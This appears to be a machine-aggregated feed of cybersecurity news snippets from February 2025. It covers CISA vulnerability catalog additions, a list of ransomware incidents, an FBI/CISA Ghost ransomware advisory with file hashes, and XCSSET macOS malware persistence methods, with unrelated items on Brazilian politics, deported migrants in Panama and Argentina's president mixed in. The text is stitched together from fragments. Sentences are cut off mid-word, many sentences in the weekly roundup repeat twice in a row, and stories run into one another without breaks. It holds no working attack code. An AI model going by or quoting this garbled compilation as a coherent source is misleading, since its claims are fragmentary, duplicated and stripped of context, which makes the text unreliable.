The two vulnerabilities are: CVE-2025-0108 Palo Alto PAN-OS Authentication Bypass Vulnerability CVE-2024-53704 SonicWall SonicOS SSLVPN Improper Authentication Vulnerability Researchers recently warned that threat actors exploit a recently disclosed vulnerability, CVE-2025-0108, in Palo Alto Networks PAN-OS firewalls.U.S. CISA adds SonicWall SonicOS and Palo Alto PAN-OS flaws to its Known Exploited Vulnerabilities catalog Pierluigi Paganini February 19, 2025 February 19, 2025 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds SonicWall SonicOS and Palo Alto PAN-OS vulnerabilities to its Known Exploited Vulnerabilities catalog. "Autosummary:
"Allied with other individuals, including civilians and military personnel, they attempted to prevent, in a coordinated manner, the result of the 2022 presidential elections from being fulfilled," he said. "Autosummary:
The blob, like in the previous step, is written to disk under the name "Unix.Directory.IconHandler.dll" in the folder %appdata\Roaming\Microsoft\Credentials\%InstallDate%\. The newly created DLL is configured to retrieve the final-stage binary from a remote server that"s responsible for running the miner implant, while also continuously checking for taskmgr.exe and procmon.exe in the list of running processes. "Autosummary:
The group claimed to have access to 1 TB of organizational data, including corporate data, financial data, NDAs, confidential data, HR data, hiring data, R&D data, engineering data, personal employee documents and information, and customer data.The review concluded on July 9, by which time it was determined that some of the affected files contained personal information, including full name, Social Security number, and possibly one or more of the following: passport number, driver’s license number, tax ID, financial account number, payment card number, medical information, and/or insurance information.While the information involved varied depending on the individual, the type of information that may have been exposed includes: name, Social Security number, address, date of birth, email address, driver’s license number, financial account information, as well as tax, medical, and health insurance information.The port took steps to block further activity, including disconnecting its systems from the internet, but the encryption and response measures affected some services, including baggage, check-in kiosks, ticketing, Wi-Fi, passenger display boards, the port’s website, the flySEA app, and reserved parking.On September 16, K&S completed this review and discovered that the potentially exposed records included the names, identification numbers, bank account numbers, and/or bank routing numbers of current and/or former employees as well as their dependents and other individuals associated with K&S. Upon discovering the incident, K&S reset passwords for all employee accounts, suspended mobile email access for employees, identified and removed malicious files, and significantly enhanced its monitoring, logging, and detection capabilities. Chemicals Innophos Holdings Inc. hit by cyberattack Manufacturing, chemicals | Denial of operations, personal data leakage Innophos Holdings Inc., a US manufacturer of chemicals for the food, health, nutrition, and industrial markets, reported to the attorney general of Maine in August that it had experienced a data breach that may have compromised sensitive personal information in its systems. Netherland, Sewell & Associates, Inc. hit by ransomware Energy | Denial of IT systems, personal data leakage| Ransomware Netherland, Sewell & Associates, Inc., a US upstream engineering provider specializing in the oil and gas industry, suffered a ransomware attack that disrupted the company’s network in July and filed a breach notification document with the attorney general of Maine in September. Kulicke and Soffa Industries, Inc. hit by ransomware Manufacturing, electronics | Denial of operations, personal data leakage | Ransomware Kulicke and Soffa Industries, Inc. (K&S), a US manufacturer of semiconductors and electronic assembly solutions, reported to the attorney general of Maine and submitted an 8-K filing that it experienced a data breach in which the sensitive personal information in its systems may have been accessed and acquired.They claimed to have stolen a wide range of information from Microchip Technology’s compromised systems, including private and personal confidential data, customer documents, as well as budget, payroll, accounting, contract, tax, ID and financial information. Electronics Microchip Technology hit by ransomware Manufacturing, electronics | Denial of IT systems, denial of operations and services, data leakage, personal data leakage | Ransomware US chip manufacturer Microchip Technology Incorporated detected suspicious activity in its information systems on August 17, according to an SEC 8-K filing.While the affected information varied depending on the individual, the type of information potentially exposed includes: name, Social Security number, date of birth, contact details, government ID and/or passport number, financial information, and medical information. Port of Seattle hit by ransomware Transportation, logistics | Denial of IT systems, denial of services, data leakage | Ransomware The Port of Seattle (USA), which operates the port and Seattle-Tacoma International Airport, announced via social media on August 24 that it had experienced certain system outages that indicated a possible cyberattack.The types of personal data affected included a combination of name, address, NRIC/FIN number, date of birth, photograph, work permit number, bank account details, telephone number and passport number. Elyria Foundry Holdings LLC hit by ransomware Manufacturing | Personal data leakage | Ransomware Elyria Foundry Holdings LLC, a US manufacturer of iron castings for various industries, including automotive, engineering, and other commercial uses, detected suspicious activity on its computer network on June 25 and filed a breach notification document with the attorney general of Maine in September. Hanon Systems USA, LLC hit by ransomware Manufacturing, automotive | Personal data leakage | Ransomware US thermal management solutions manufacturer Hanon Systems USA, LLC was the victim of a ransomware event on July 21 that saw certain information accessed by a third-party actor and held under the threat of ransom, according to a breach notification document filed with the Maine attorney general in September.After detecting the incident with its security tools, the company immediately initiated its standard response protocols to contain, assess and remediate the incident, including beginning an investigation with outside experts, activating its incident response plan, notifying federal law enforcement authorities, and taking certain systems offline out of an abundance of caution.The company said the personal information stolen by the attackers varied depending on the victim’s relationship with the company and may have included: name, date of birth, Social Security number, address, salary information, W-2s, and tax return documents.While the affected information varies depending on the individual, the type of information potentially exposed includes: name, Social Security number, driver’s license number, state or federal identification number, financial account information, and health insurance information.The following types of personal information were stored on the compromised systems: full name, date of birth, driver’s license number, Social Security number, bank account number and routing number, and other personnel-related information, including medical questionnaires. Kantsu hit by ransomware Transportation, logistics | Denial of services, denial of operations, personal data leakage | Ransomware Japanese logistics and transportation company Kantsu was the victim of a ransomware attack on September 12, resulting in the detection of an infection on some of its servers and the shutdown of its networks to prevent further attacks. Logistics and transportation JAS Worldwide hit by ransomware Transportation, logistics | Denial of IT services, denial of operations| Ransomware JAS Worldwide, a global freight company headquartered in the USA, confirmed on August 27 that it had been the victim of a ransomware cyberattack that had disrupted its operations and customer services. S&F Concrete Contractors, Corp. hit by ransomware Construction, engineering | Personal data leakage | Ransomware US construction company S&F Concrete Contractors, Corp. notified the attorneys general of Vermont and Maine it had experienced a data breach that may have compromised the sensitive personal identifiable information and protected health information in its systems. Oldenburg Group hit by ransomware Manufacturing | Personal data leakage | Ransomware Oldenburg Group and its Visa Lighting division, a US-based supplier of heavy equipment and architectural lighting products, reported to the attorneys general of Maine and Vermont that it experienced a cyberattack between May 4 and May 5, in which an attacker believed to be associated with the Play ransomware group installed ransomware on the company’s primary servers and may have accessed personal information stored on the servers. V.H. Blackinton & Company hit by cyberattack Manufacturing | Personal data leakage V.H. Blackinton & Company, Inc., a US manufacturer of public safety badges and uniform insignias, discovered unusual activity in its digital environment on August 30, according to a report submitted to the attorneys general of Maine and Vermont in September. CRB Engineering hit by ransomware Construction, engineering | Denial of IT systems, personal data leakage | Ransomware US engineering, construction and consulting firm CRB Engineering notified the New Hampshire attorney general that it had experienced a data breach that may have compromised the sensitive personal identifiable information in its systems. Noritsu America Corporation hit by ransomware Manufacturing | Personal data leakage | Ransomware Noritsu America Corporation, a US manufacturer of high-end professional digital imaging equipment and a subsidiary of the Japanese holding company Noritsu, was the victim of a cyberattack that exfiltrated personal information, according to a data breach notification submitted in August. Anderson Feazel Management, Inc. hit by cyberattack Energy | Personal data leakage US energy company Anderson Feazel Management, Inc., which specializes in oil and gas production, suffered an attack on its computer system on or around July 31.Upon detecting the unauthorized activity, the company immediately began taking steps to contain, assess and remediate the incident, including launching an investigation, activating its incident response plan, and shutting down some systems. Basement Systems hit by ransomware Construction, engineering | Denial of IT systems, personal data leakage | Ransomware US construction company Basement Systems notified the attorneys general of Maine and Vermont that it had experienced a data breach that may have compromised the sensitive personal identifiable information in its systems. Granit Design hit by ransomware Manufacturing | Personal data leakage | Ransomware Granit Design, a Canadian manufacturer of natural stone, quartz and ultra-compact surfaces, notified the attorneys general of Maine and Vermont in September that it had experienced a cybersecurity incident affecting the confidentiality of its employee data. Blue Ridge Rural Water Company Inc. hit by cyberattack Water supply, energy, utility | Personal data leakage US-based Blue Ridge Rural Water Company Inc. suffered a cyberattack on its corporate network, which was a separate system from its water management network. "Autosummary:
“In these operations, UNC5792 has hosted modified Signal group invitations on actor-controlled infrastructure designed to appear identical to a legitimate Signal group invite” - Google Threat Intelligence Group The fake invitations had the legitimate redirect JavaScript code replaced with a malicious block that included Signal’s URI (Uniform Resource Identifier) for linking a new device (“sgnl://linkdevice uuid”) instead of the one for joining the group (“sgnl://signal.group/”). "Autosummary:
"Autosummary:
OpenSSH bugs allows Man-in-the-Middle and DoS Attacks Pierluigi Paganini February 19, 2025 February 19, 2025 Two OpenSSH vulnerabilities could allow machine-in-the-middle (MitM) and denial-of-service (DoS) attacks under certain conditions. "Autosummary:
"Autosummary:
"Palo Alto Networks has observed exploit attempts chaining CVE-2025-0108 with CVE-2024-9474 and CVE-2025-0111 on unpatched and unsecured PAN-OS web management interfaces," reads the updated bulletin. "Autosummary:
Just as EDR transformed endpoint security, Browser Detection & Response (BDR) must become a core component of enterprise security, enabling real-time telemetry, JavaScript execution analysis, and browser-layer threat intelligence integration into security operations. By operating within the browser’s execution environment, these threats evade traditional detection mechanisms, allowing cybercriminals to hijack user sessions, pass drive-by downloads, steal credentials, and compromise sensitive data. Threat trail for web-based mail phishing attack in Keep Aware Organizations must adopt a browser-native threat detection model, monitoring session behaviors, credential input patterns, and high-risk interactions in real time. "Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Ghost (Cring)—(“Ghost”)—ransomware IOCs and TTPs identified through FBI investigation as recently as January 2025.
Beginning early 2021, Ghost actors began attacking victims whose internet facing services ran outdated versions of software and firmware. This indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizations across more than 70 countries, including organizations in China. Ghost actors, located in China, conduct these widespread attacks for financial gain. Affected victims include critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small- and medium-sized businesses.
Ghost actors rotate their ransomware executable payloads, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses, which has led to variable attribution of this group over time. Names associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Samples of ransomware files Ghost used during attacks are: Cring.ex "
Autosummary:
Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, and the MS-ISAC.Their methodology includes leveraging vulnerabilities in Fortinet FortiOS appliances (CVE-2018-13379), servers running Adobe ColdFusion (CVE-2010-2861 and CVE-2009-3960), Microsoft SharePoint (CVE-2019-0604), and Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207— commonly referred to as the ProxyShell attack chain).The FBI, CISA, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, date of infection, date detected, initial attack vector, and host and network-based indicators.Names associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture.Slight variation of github[.]com/BeichenDream/Chunk-Proxy/blob/main/proxy.aspx Table 2: MD5 File Hashes Associated with Ghost Ransomware Activity File name MD5 File Hash Cring.exe c5d712f82d5d37bb284acd4468ab3533 Ghost.exe 34b3009590ec2d361f07cac320671410 d9c019182d88290e5489cdf3b607f982 ElysiumO.exe 29e44e8994197bdb0c2be6fc5dfc15c2 c9e35b5c1dc8856da25965b385a26ec4 d1c5e7b8e937625891707f8b4b594314 Locker.exe ef6a213f59f3fbee2894bd6734bbaed2 iex.txt, pro.txt (IOX) ac58a214ce7deb3a578c10b97f93d9c3 x86.log (IOX) c3b8f6d102393b4542e9f951c9435255 0a5c4ad3ec240fbfd00bdc1d36bd54eb sp.txt (IOX) ff52fdf84448277b1bc121f592f753c5 main.txt (IOX) a2fd181f57548c215ac6891d000ec6b9 isx.txt (IOX) 625bd7275e1892eac50a22f8b4a6355d sock.txt (IOX) db38ef2e3d4d8cb785df48f458b35090 Ransom Email Addresses Table 3 is a subset of ransom email addresses that have been included in Ghost ransom notes. Validate Security Controls In addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory.Affected victims include critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small- and medium-sized businesses. The FBI is interested in any information that can be shared, to include logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, and/or decryptor files.Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to FBI’s Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844-Say-CISA (1-844-729-2472). Impact and Encryption Ghost actors use Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe, which are all ransomware executables that share similar functionality.This includes running scans to discover other network connected devices, running commands to list, add, or alter administrator accounts, using PowerShell to download and execute remote programs, and running scripts not usually seen on a network. Ghost actors rotate their ransomware executable payloads, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses, which has led to variable attribution of this group over time. "Autosummary:
"The executables delivered through fake download pages follow a consistent execution pattern involving temporary file extraction, process injection, security modifications, and network communications," Hunt.io said, adding the samples exhibit infostealer-like functionality associated with a malware strain referred to as MicroClip. "Autosummary:
The complaint names the men as Pablo Zuniga Cartes, Ignacio Zuniga Cartes, Bastian Jimenez Freraut, Jordan Quiroga Sanchez, Bastian Orellano Morales, Alexander Huiaguil Chavez, and Sergio Ortega Cabello. "Autosummary:
Getty Images Migrants in the Decápolis Hotel try to catch the attention of those outside However, of the 299 undocumented migrants - from India, China, Uzbekistan, Iran, Vietnam, Turkey, Nepal, Pakistan, Afghanistan and Sri Lanka - only 171 have agreed to return to their countries of origin. A photo taken by one of the deported migrants from inside the hotel where they remain isolated in Panama City Using a hidden mobile phone, since contact with those outside of the Decápolis Hotel is reportedly not allowed, the Iranian woman said the migrant told her there were several children in the hotel, that they have been denied a lawyer and that they are not allowed to leave their rooms even to eat.Hundreds deported from US held in Panama hotel 2 hours ago Cecilia Barría, Santiago Vanegas and Ángel Bermúdez BBC News Mundo Getty Images Two people who have been deported from the US ask for help from the window of the Decápolis Hotel in Panama City In a room at the luxury Decápolis Hotel in Panama City, two girls hold a piece of paper to the window with a written message. "Autosummary:
"Autosummary:
"Airport Cybersecurity Engineer II Salt Lake City Corporation | USA | On-site – View job details As an Airport Cybersecurity Engineer II, you will develop and implement policies, procedures, and training plans for security and network administration. Assess and mitigate cybersecurity threats. Manage incident response and recovery plans. Application Security Architect WalkMe | Israel | Hybrid – View job details As an Application Security Architect, you will conduct design and code reviews to ensure secure … More
The post Cybersecurity jobs available right now: February 18, 2025 appeared first on Help Net Security.
"Autosummary:
Security Engineer Clover Health | Canada | Remote – View job details As a Security Engineer, you will implement, operationalize and monitor security applications such as EDR, DLP, SAST, vulnerability management, and CSPM systems. Security Architect, AI, Automation IBM | Ireland | Hybrid – View job details As a Security Architect, AI, Automation, you will collaborate with SecDevOps teams to integrate security into CI/CD pipelines, ensuring compliance with regulatory standards like FedRAMP and NIST. Cyber Security Engineer ALTEN | Belgium | Hybrid – View job details As a Cyber Security Engineer, you will analyze system and network requirements, and design secure architectures from scratch, ensuring network hardening and the application of best security practices. Network Security Engineer Al Etihad Payments | UAE | On-site – View job details As a Network Security Engineer, you will will be responsible for designing, implementing, and maintaining the network and security infrastructure of AEP’s. "Autosummary:
"The attacker accomplishes two impressive goals with this malicious script: avoiding easy detection by security scanners by encoding the malicious script within an <img> tag, and ensuring end users don"t notice unusual changes when the malicious form is inserted, staying undetected as long as possible," Martin said. "Autosummary:
"Autosummary:
The new variant of the malware uses two methods for persistence: the “zshrc” method, where it creates a file to launch on new shell sessions, and the “dock” method, where it downloads a tool to replace a legitimate Launchpad app with a fake one, executing both the app and malware. "Autosummary:
"The incident impacted the Company"s operations, including distribution of products, billing, collections, and vendor payments. "Autosummary:
The Russian group, known as Storm-2372, has targeted government and non-governmental organisations (NGOs), as well as firms working in IT, defence, telecoms, health, and the energy sector. "Autosummary:
TA2726, per the enterprise security firm, acts as a TDS for TA2727 and another threat actor called TA569, which is responsible for the distribution of a JavaScript-based loader malware referred to as SocGholish (aka FakeUpdates) that often masquerades as a browser update on legitimate-but-compromised sites. "Autosummary:
"Autosummary:
Yes, adversaries are definitely continuing to innovate, and while AI will certainly start playing a larger and larger role, the latest data suggests that a set of well-known tactics, techniques, and procedures (TTPs) are still dominating the field.With legitimate processes cloaking malicious operations and actual day-to-day network traffic hiding nefarious data uploads, bad actors can exfiltrate data right under your security team"s proverbial nose, no Hollywood-style "smash-and-grab" needed. "Autosummary:
Argentina"s President Milei denies crypto fraud allegations On Monday, Milei said he had acted "in good faith" and dismissed investors" complaints, comparing their actions to people who gamble: "If you go to a casino and lose money, what"s there to complain about when you knew the risks?" A judge will now determine if the president should face fraud charges over the incident. "Autosummary:
The Disconnect Between Compliance and Security Compliance frameworks like PCI-DSS, SEC, and DORA are designed to protect sensitive data and reduce risk, providing clear guidance on managing confidentiality, integrity, and availability.Organizations must go beyond regulatory requirements by incorporating proactive security measures, such as: Validating defenses regularly to ensure effectiveness Identifying gaps in vendor security and third-party integrations Eliminating security weaknesses caused by misconfigurations, poor access controls, and outdated policies. "Cybersecurity professionals may be concerned about the constantly shifting threat landscape. From the increased use of artificial intelligence (AI) by malicious actors to the expanding attack surface, cybersecurity risks evolve, and defenders need to mitigate them. Despite a period of cybersecurity budget growth between 2021 and 2022, this growth has slowed in the last few years, meaning that cybersecurity leaders need to carefully consider how their purchases improve their current security and compliance posture. To … More
The post 6 considerations for 2025 cybersecurity investment decisions appeared first on Help Net Security.
"Autosummary:
As organizations choose their cybersecurity investments for 2025, they should consider how to implement identity hygiene, processes for implementing, maintaining, and monitoring user access across complex environments, including those consisting of interconnected applications and large numbers of difficult-to-manage users, like service accounts. Some examples of ways that these service accounts can create risks include: Developers building in-house systems who create a security workaround Third-party vendors’ systems Legacy devices, accounts, and entitlements whose password policies haven’t been updated Identifying and managing service accounts will be a key security risk mitigation strategy. Reducing friction for users improves security adoption Organizations need to deploy more security products, create deeper security policies, and monitor their environment with more rigor, but each time they add a new control they create additional friction for the end users. "BlackLock is on track to become the most active ransomware-as-a-service (RaaS) outfit in 2025, according to ReliaQuest. Its success is primarily due to their unusually active presence and good reputation on the ransomware-focused Russian-language forum RAMP, and their aggressive recruiting of traffers (individuals that steer victims to harmful content/software), initial access brokers (IABs), and affiliates. What is BlackLock? BlackLock (aka El Dorado or Eldorado) cropped up in early 2024. It uses custom-built ransomware that can … More
The post BlackLock ransomware onslaught: What to expect and how to fight it appeared first on Help Net Security.
"Autosummary:
BlackLock’s representative on RAMP forum, who goes by “$$$”, is highly active: they are making connections and building trust, engaging in chats in various forum sections, and are often reaching out to developers, initial access brokers, potential affiliates, and rival gangs. "A new report from Gen highlights a sharp rise in online threats, capping off a record-breaking 2024. Between October and December alone, 2.55 billion cyber threats were blocked – an astonishing rate of 321 per second. The risk of encountering a threat climbed to 27.7% in Q4, with social engineering attacks accounting for 86% of all blocked threats. This underscores the increasingly sophisticated psychological tactics cybercriminals are using to deceive victims. “We’re continuing to see … More
The post Cybercriminals shift focus to social media as attacks reach historic highs appeared first on Help Net Security.
"Autosummary:
“We’re continuing to see scam-related threats becoming far more dangerous as they hide, sometimes in plain sight, throughout every aspect of our digital life,” said Siggi Stefnisson, Cyber Safety CTO at Gen. “This quarter we saw them prey on people’s emotions, such as the need to shop on budget during the holidays, the desire to find love during the end of the year, the hope for change during government elections and more. The dark side of social media Phishing attacks surged by 14% in Q4 2024, with cybercriminals exploiting website-building platforms like Wix to create convincing fake sites and spoofing brands like Apple iCloud through fraudulent invoice scams. "Unit21 launched its new scams solution that helps financial institutions and fintechs detect and stop scams before they cause financial harm. Using AI automation, the new solution can be integrated into a fraud team’s workflow to accelerate investigations and response times while also incorporating IP insights and consortium signals to prevent and detect scams before they hit consumer financial accounts. Advancements in technology have allowed criminals to scam consumers and businesses at unprecedented speed and … More
The post Unit21 empowers financial institutions to detect and stop scams appeared first on Help Net Security.
"Autosummary:
Shut down fraudulent logins in real-time : IP data enrichment flags VPNs, proxies, Tor, and bots to prevent fraudulent access. "Autosummary:
"Autosummary:
"Autosummary:
And also consider the following: Use strong, unique passwords for every account, ideally stored in a password manager Be sure to switch on two-factor authentication (2FA) for an extra layer of access security Make sure all of your work and personal devices are regularly patched and up to date If your IT department offers, join regular phishing simulation exercises to understand what to look out for If you receive a suspect message, never click on embedded links or open the attachment Contact the sender through other channels if you’re concerned – but not by replying to the email or using the contact details listed on it Report any suspect emails to your employer’s IT department Check whether colleagues have received the same message Employment termination scams have been around for some time.It may be something completely different, or it could be an attempt to mimic the impersonated company’s domain, using typos and other characters (e.g., m1crosoft.com, @microsfot.com) A generic greeting (e.g., “dear employee/user”), which is certainly not the tone a legitimate termination letter would take. At their simplest, job termination scams are a type of phishing attack designed to trick you into handing over your personal and financial information, or on clicking on a malicious link which could trigger a malware download. "Autosummary:
This week"s list includes — CVE-2025-1094 (PostgreSQL), CVE-2025-0108 (Palo Alto Networks PAN-OS), CVE-2025-23359 (NVIDIA Container Toolkit), CVE-2025-21391 (Microsoft Windows Storage), CVE-2025-21418 (Microsoft Windows Ancillary Function Driver for WinSock), CVE-2024-38657, CVE-2025-22467, CVE-2024-10644 (Ivanti Connect Secure), CVE-2024-47908 (Ivanti Cloud Services Application), CVE-2024-56131, CVE-2024-56132, CVE-2024-56133, CVE-2024-56134, CVE-2024-56135 (Progress Kemp LoadMaster), CVE-2025-24200 (Apple iOS and iPadOS), CVE-2024-12797 (OpenSSL), CVE-2025-21298 (Microsoft Windows OLE), CVE-2025-1240 (WinZip), CVE-2024-32838 (Apache Fineract), CVE-2024-52577 (Apache Ignite), CVE-2025-26793 (Hirsch Enterphone MESH), CVE-2024-12562 (s2Member Pro plugin), CVE-2024-13513 (Oliver POS – A WooCommerce Point of Sale (POS) plugin), CVE-2025-26506 (HP LaserJet), CVE-2025-22896, CVE-2025-25067, CVE-2025-24865 (mySCADA myPRO Manager), CVE-2024-13182 (WP Directorybox Manager plugin), CVE-2024-10763 (Campress theme), CVE-2024-7102 (GitLab CE/EE), CVE-2024-12213 (WP Job Board Pro plugin), CVE-2024-13365 (Security & Malware scan by CleanTalk plugin), CVE-2024-13421 (Real Estate 7 theme), and CVE-2025-1126 (Lexmark Print Management Client). — Threat actors are attempting to actively exploit two known security vulnerabilities impacting ThinkPHP (CVE-2022-47945, CVSS score: 9.8) and OwnCloud (CVE-2023-49103, CVSS score: 10.0) over the past few days, with attacks originating from hundreds of unique IP addresses, most of which are based in Germany, China, the U.S., Singapore, Hong Kong, the Netherlands, the U.K., and Canada.Critical ThinkPHP and OwnCloud Flaws Under Active Exploitation — Threat actors are attempting to actively exploit two known security vulnerabilities impacting ThinkPHP (CVE-2022-47945, CVSS score: 9.8) and OwnCloud (CVE-2023-49103, CVSS score: 10.0) over the past few days, with attacks originating from hundreds of unique IP addresses, most of which are based in Germany, China, the U.S., Singapore, Hong Kong, the Netherlands, the U.K., and Canada.Datadog, which detailed the attack, said roughly 1% of organizations monitored by the company were affected by the whoAMI, and that it found public examples of code written in Python, Go, Java, Terraform, Pulumi, and Bash shell using the vulnerable criteria.Datadog, which detailed the attack, said roughly 1% of organizations monitored by the company were affected by the whoAMI, and that it found public examples of code written in Python, Go, Java, Terraform, Pulumi, and Bash shell using the vulnerable criteria.The individual, one of the officials of the SSU Counterterrorism Center, is alleged to have been recruited by Russia"s Federal Security Service (FSB) in Vienna in 2018, and actively began engaging in espionage at the end of December last year, transmitting documents containing state secrets, to the intelligence agency via a "special mobile phone."The individual, one of the officials of the SSU Counterterrorism Center, is alleged to have been recruited by Russia"s Federal Security Service (FSB) in Vienna in 2018, and actively began engaging in espionage at the end of December last year, transmitting documents containing state secrets, to the intelligence agency via a "special mobile phone.""These vulnerabilities can lead to data corruption, sensitive data exposure, program crashes, and unauthorized code execution," the agencies said, labeling them as unforgivable defects."These vulnerabilities can lead to data corruption, sensitive data exposure, program crashes, and unauthorized code execution," the agencies said, labeling them as unforgivable defects. — The RansomHub ransomware operation has targeted over 600 organizations across the world, spanning sectors such as healthcare, finance, government, and critical infrastructure, making it one of the most active cybercrime groups in 2024.RansomHub Targets Over 600 Orgs Globally — The RansomHub ransomware operation has targeted over 600 organizations across the world, spanning sectors such as healthcare, finance, government, and critical infrastructure, making it one of the most active cybercrime groups in 2024.Separately, the Justice Department has also charged Canadian national Andean Medjedovic, 22, for exploiting smart contract vulnerabilities in two decentralized finance crypto platforms, KyberSwap and Indexed Finance, to fraudulently obtain about $65 million from the protocols" investors between 2021 and 2023.Separately, the Justice Department has also charged Canadian national Andean Medjedovic, 22, for exploiting smart contract vulnerabilities in two decentralized finance crypto platforms, KyberSwap and Indexed Finance, to fraudulently obtain about $65 million from the protocols" investors between 2021 and 2023. — A new report from the Alliance for Securing Democracy (ASD) has found that foreign nation-state actors from Russia, China, and Iran are running influence operations that exploit trust in local sources and impact state and local communities in the U.S. with an aim to manipulate public opinion, stoke discord, and undermine democratic institutions.Foreign Adversaries Target Local Communities in the U.S. for Influence Ops — A new report from the Alliance for Securing Democracy (ASD) has found that foreign nation-state actors from Russia, China, and Iran are running influence operations that exploit trust in local sources and impact state and local communities in the U.S. with an aim to manipulate public opinion, stoke discord, and undermine democratic institutions. "The suspected Chinese state-sponsored hackers who breached workstations of several US Treasury employees in December 2024 did so by leveraging not one, but two zero-days, according to Rapid7 researchers. It was initially reported that the attackers compromised the Treasury’s BeyondTrust Remote Support SaaS instances via CVE-2024-12356, a previously unknown unauthenticated command injection vulnerability. But, as Rapid7 researchers discovered (and confirmed by testing), “a successful exploit for CVE-2024-12356 had to include exploitation of CVE-2025-1094 in order … More
The post A PostgreSQL zero-day was also exploited in US Treasury hack (CVE-2025-1094) appeared first on Help Net Security.
"Autosummary:
“An attacker who can generate a SQL injection via CVE-2025-1094 can then achieve arbitrary code execution (ACE) by leveraging the interactive tool’s ability to run meta-commands,” Stephen Fewer, Principal Security Researcher at Rapid7, explained. "Autosummary:
Module names in the code are also obfuscated, which makes more difficult analyzing their intent Two persistence techniques (zshrc and dock) New Xcode infection methods: the malware uses the TARGET, RULE, or FORCED_STRATEGY options to place the payload in the Xcode project. "A new, improved variant of the XCSSET macOS malware has been spotted “in limited attacks” by Microsoft’s threat researchers. XCSSET macOS malware XCSSET in information-stealing and backdoor-injecting malware targeting Mac users. It’s usually distributed via infected Xcode projects – a collection of files, settings, and configurations that make up an app or framework developed using Xcode, Apple’s official integrated development environment (IDE) for macOS. The threat has been around for years. Past variants even used … More
The post The XCSSET info-stealing malware is back, targeting macOS users and devs appeared first on Help Net Security.
"Autosummary:
The malware also uses new persistence mechanisms: It creates a file named ~/.zshrc_aliases, which contains the payload, and appends a command to it that will launch it every time a new shell session is initiated It downloads a signed dockutil tool from a command-and-control server to manage the dock items, creates a fake Launchpad application, and replaces the legitimate Launchpad’s path entry in the dock with the fake one. "Autosummary:
"Autosummary:
Former President Cristina Fernández de Kirchner, who is now in opposition, was heavily critical, calling him a "crypto scammer" in a post seen 6.4 million times. "Autosummary:
" While Finastra has yet to share the number of individuals affected by the data breach and the nature of the exposed data (besides victims" names), the company started sending breach notification letters last week to at least 65 people in the state whose financial account information was stolen (according to filings with the Attorney General"s office in Massachusetts). "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Microsoft fixes two actively exploited zero-days (CVE-2025-21418, CVE-2025-21391) February 2025 Patch Tuesday is here, and Microsoft has delivered fixes for 56 vulnerabilities, including two zero-days – CVE-2025-21418 and CVE-2025-21391 – under active exploitation. PAN-OS authentication bypass hole plugged, PoC is public (CVE-2025-0108) Palo Alto Networks has fixed a high-severity authentication bypass vulnerability (CVE-2025-0108) in the management web interface of its … More
The post Week in review: Microsoft fixes two actively exploited 0-days, PAN-OS auth bypass hole plugged appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: February 14, 2025 Here’s a look at the most interesting products from the past week, featuring releases from Armor, EchoMark, Netwrix, Palo Alto Networks, and Socure. "Autosummary:
"Autosummary:
Storm-2372’s targets during this time have included government, non-governmental organizations (NGOs), information technology (IT) services and technology, defense, telecommunications, health, higher education, and energy/oil and gas in Europe, North America, Africa, and the Middle East.” "Autosummary:
File operations (copying, deleting, or overwriting files) PowerShell execution (without launching powershell.exe) Elastic Security Labs also observed a Linux variant of FinalDraft, which can still use Outlook via REST API and Graph API, as well as HTTP/HTTPS, reverse UDP & ICMP, bind/reverse TCP, and DNS-based C2 exchange. "Autosummary:
"Autosummary:
"By allowing fingerprinting, Google has given itself - and the advertising industry it dominates - permission to use a form of tracking that people can"t do much to stop," said Martin Thomson, distinguished engineer at Mozilla, a rival to Google. "Autosummary:
The targets are in the government, NGO, IT services and technology, defense, telecommunications, health, and energy/oil and gas sectors in Europe, North America, Africa, and the Middle East. "Autosummary:
The zero-day impacts the following devices: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later. The two vulnerabilities are: CVE-2025-24200 Apple iOS and iPadOS Incorrect Authorization Vulnerability CVE-2024-41710 Mitel SIP Phones Argument Injection Vulnerability This week Apple released emergency security updates to address a zero-day vulnerability, tracked as CVE-2025-24200, that the company believes was exploited in “extremely sophisticated” targeted attacks. "Autosummary:
